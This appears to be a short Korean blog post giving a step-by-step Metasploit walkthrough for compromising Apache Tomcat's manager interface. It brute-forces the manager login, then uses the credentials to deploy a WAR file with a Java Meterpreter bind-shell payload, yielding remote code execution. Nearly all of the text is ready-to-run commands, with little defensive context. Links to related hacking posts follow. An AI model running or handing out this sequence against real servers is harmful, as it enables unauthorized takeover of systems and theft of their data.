톰캣에서 [서버주소]:[서버포트]/manager/html 로 접속하게 되면 관리자 페이지 로그인 아이디와 비밀번호
입력 알림창이 뜬다. 이 상태에서 칼리에서 msfconsole을 틀어준다.
>service postgresql start
>msfconsole
>search tomcat
>use auxiliary/scanner/http/tomcat_mgr_login - mgr, 즉 매니저 로그인 취약점을 통해 아이디 비번을 알아낸다.
>show options
>set rhosts [서버아이피]
>set rport [서버포트]
>exploit
익스플로잇 후 성공한 목록의 아이디 비밀번호로 접속한다.
그 후 WAR file to deploy 탭을 활용한 취약점 해킹을 시도한다.
>back
>clear
>search tomcat
>use exploit/multi/http/tomcat_mgr_deploy - tomcat의 deploy 취약점을 이용한 해킹 시도
>show options
>set password [관리자 비번(매니저 비번)]
>set rhost [서버아이피]
>set rport [서버포트]
>set username [관리자 아디]
>show payloads
>set payload java/meterpreter/bind_tcp - 자바 미터프리터의 bind tcp 페이로드를 사용한다.
>show options
>exploit
'3. 웹 애플리케이션 취약점 진단' 카테고리의 다른 글
| OSINT - Shodan을 사용한 정보 수집 방법 (0) | 2024.06.20 |
|---|---|
| 로그인 과정 패킷에서 도출되는 ReturnURL을 활용한 악성 컨텐츠 삽입 방법 + URL 주소 패턴 탐지 우회 (0) | 2024.06.20 |
| JS Shell 자바스크립트 [웹 기반 자바스크립트 셸] (0) | 2023.12.28 |
| 취약점 분석 도구 nessus 설치법 (0) | 2023.12.28 |
| Ettercap으로 공유기 계정 해킹 (0) | 2023.12.28 |
